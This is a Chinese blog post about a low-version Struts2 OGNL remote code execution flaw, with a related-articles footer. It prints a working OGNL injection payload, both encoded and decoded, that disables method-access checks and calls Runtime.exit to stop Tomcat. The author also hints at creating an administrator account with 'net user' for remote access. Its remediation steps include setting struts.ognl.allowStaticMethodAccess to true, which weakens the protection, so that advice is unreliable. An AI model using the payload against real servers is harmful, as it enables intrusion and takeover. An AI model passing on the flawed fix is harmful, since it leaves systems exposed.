Struts2低版本安全漏洞及解决办法

最新推荐文章于 2021-04-19 02:00:40 发布
最新推荐文章于 2021-04-19 02:00:40 发布
阅读量210 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: Struts 开源项目 文章标签: java web.xml runtime
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/cwfmaker/article/details/84376187
文章详细介绍了Struts2的低版本漏洞利用方法及防范措施,包括代码转换原理、危害后果、解决办法以及更新包、配置文件修改等内容。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

Strusts2的低版本漏洞相信大家都知道了,前几天的时候尝试了一下,果然危害极大

      其实不用知道太多,我们只需要知道

      ?('\u0023_memberAccess[\'allowStaticMethodAccess\']')(meh)=true&(aaa)(('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003d\u0023foo')(\u0023foo\u003dnew%20java.lang.Boolean("false")))&(asdf)(('\u0023rt.exit(1)')(\u0023rt\u003d@java.lang.Runtime@getRuntime()))=1

    会转换成:

     ?('#_memberAccess['allowStaticMethodAccess']')(meh)=true&(aaa)(('#context['xwork.MethodAccessor.denyMethodExecution']=#foo')(#foo=new%20java.lang.Boolean("false")))&(asdf)(('#rt.exit(1)')(#rt=@java.lang.Runtime@getRuntime()))=1

    这就等价于:

    java.lang.Runtime.getRuntime().exit(1); 

   也就是说的关闭当前tomcat

   当然我们也可以使用net user admin 123/add +****

   这样的话我们就可以获得远程登录权限....,你懂的。

   解决办法如下:

替换如下的包
commons-fileupload-1.2.2.jar
commons-io-2.0.1.jar
commons-lang-2.5.jar
freemarker-2.3.18.jar
javassist-3.11.0.GA.jar(必须)
ognl-3.0.3.jar(必须)
struts2-core-2.3.1.jar(必须)
xwork-core-2.3.1.jar(必须)
struts2-spring-plugin-2.3.1.2.jar(必须)
2.修改struts.xml文件在头部加入这句话<constant name="struts.ognl.allowStaticMethodAccess" value="true"></constant> (允许标签使用静态方法)
3.修改web.xml把
org.apache.struts2.dispatcher.FilterDispatcher替换为
org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter

 

漏洞复现篇——Struts2反序列化漏洞
爱国小白帽
03-03 4145
Struts2是什么? Struts2 是 Apache 软件组织推出的一个相当强大的 Java Web 开源框架,本质上相当于一个 servlet。Struts2 基于 MVC 架构,框架结构清晰。通常作为控制器(Controller)来建立模型与视图的数据交互,用于创建企业级 Java web 应用程序 这套 Struts2 入门教程对 Struts2 框架进行了讲解,采用基础知识与案例相结...
struts2反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017
08-28
struts2.0反序列化漏洞,存在s2-005、s2-016、s2-016_3、s2-017等漏洞解决方案,已升级可用
低版本struts2升级高版本避免漏洞方案
03-21
低版本struts2安全漏洞,尽量升级高版本
Struts 2 S2-045 Jakarta插件远程代码执行漏洞加固方法
Coisini的博客
05-27 565
Struts 2 S2-045 Jakarta插件远程代码执行漏洞加固方法 近日,安恒信息安全研究院WEBIN实验室高级安全研究员nike.zheng发现著名J2EE框架-Struts2存在远程代码执行的严重漏洞漏洞编号: S2-045,CVE-2017-5638 漏洞名称: 基于 Jakarta plugin插件的Struts远程代码执行漏洞 官方评级: 高危 漏洞描述: Apache St...
Struts2低版本安全漏洞修复策略与防范措施
Struts2是一款广泛使用的开源Web...通过采取上述措施,可以有效降低Struts2低版本的安全风险,并确保Web应用程序的安全运行。同时,为了进一步保障系统的安全性,建议始终关注Struts2及其相关库的官方安全公告和更新。
Struts2 安全漏洞解决方法
09-15
Struts2 安全漏洞解析,距离上个版本发布仅仅过去1周,apache struts官网又发布struts2最新版本安全公告,主要修复了一个漏洞,代号S2-022:从漏洞简要描述来看,确定是对之前S2-021的补充。
基于Python语言的Struts2安全漏洞扫描设计源码
最新发布
10-01
基于Python语言的Struts2安全漏洞扫描设计源码,正是为解决这一问题而精心设计和构建的。 该项目的核心是通过一系列精心设计的Python脚本,对运行Struts2框架的Web应用程序进行全面的安全性扫描。源码项目共包含21...
struts2漏洞s2-045,不升级jar版本的修补方法,已验证.docx
07-04
S2-045 漏洞是一个严重的安全漏洞,影响 Struts2 的多个版本,包括 2.3.5-2.3.31 和 2.5-2.5.102。该漏洞是由于 Struts2 中的 MultiPartRequestWrapper 类中的一个错误导致的,该错误可能会导致攻击者可以上传恶意...
Struts 2漏洞及其影响版本(记录备查)
JEFFYU328的专栏
04-19 684
1、Struts 2被曝存在远程命令执行漏洞漏洞编号S2-045,CVE编号CVE-2017-5638,在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。 Struts 2.3.5 – Struts 2.3.31 Struts 2.5 – Struts 2.5.1 2、 3、 ...
struts2目前无漏洞版本
11-14
struts2经常被发现有各种各样的漏洞,黑客会利用这些漏洞进行系统攻击,这个版本是目前已修复所有露的版本2.5.13
Struts2 升级2.5版本 用以减少Struts版本过低而出现的系统安全漏洞
随风而行 愿你拥有善良的心能得到珍惜,愿你能实现你的梦想。
08-16 803
Struts2 升级2.5版本 用以减少Struts版本过低而出现的系统安全漏洞      最近项目为了要申请域名,所以要检查漏洞,代码这边由于由于Struts版本过低而出现的任意命令执行漏洞,老项目果然坑多: 那么接下来就只能升级Sturts框,首先是替换jar包,我项目原来有关于Sturts2的jar包如下:   提供一个jar包下载网站:https://www.findjar...
struts2漏洞原理及解决办法
cuixiang1022的专栏
10-26 464
1、原理 Struts2的核心是使用的webwork框架,处理 action时通过调用底层的getter/setter方法来处理http的参数,它将每个http参数声明为一个ONGL(这里是ONGL的介绍)语句。当我们提交一个http参数: ?user.address.city=Bishkek&user['favoriteDrink']=kumys  ONGL将它转换为: acti
struts22.0升到2.3.37版本时遇到的坑(升级前功能均正常,升级后产生的问题)
moxiaofan123的博客
03-31 2239
此文解决的是升级后的后遗症解决,如何升级,这个到处可以搜到,文章不做赘述,后遗症中重点是第三项 1、找不到某个类,但是类确实存在,最后发现原来是action name和jsp内的form 的action不一致 2、redirect-action 需要变为redirectAction 3、 当使用struts2 <s:property 字段展示数据时,对象的属性的第二个字母不能是大写(测试得出的结论),比如account.vPassword ,需要使用account.getVPassw
Tomcat爆出严重漏洞,影响所有版本,附解决方案!
热门推荐
xmt1139057136的专栏
02-22 1万+
作者:业余草来源:https://www.xttblog.com/?p=4809昨天,群里聊嗨了。大家都在远程办公,却都急急忙忙的升级线上的 Tomcat 版本,原因就是 Tomcat ...
struts2升级到Struts 2.3.15.1的步骤(最新安全版本
weilikk的博客
08-27 912
       最近struts安全问题影响很大啊,iteye上面也有新闻:Apache Struts团队6月底发布了Struts 2.3.15版本,由于该版本被发现存在重要的安全漏洞,因此该团队今天发布了Struts 2.3.15.1安全更新版本。  新闻地址:http://www.iteye.com/news/28053          因此我升级了下当前项目的struts版本,原来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值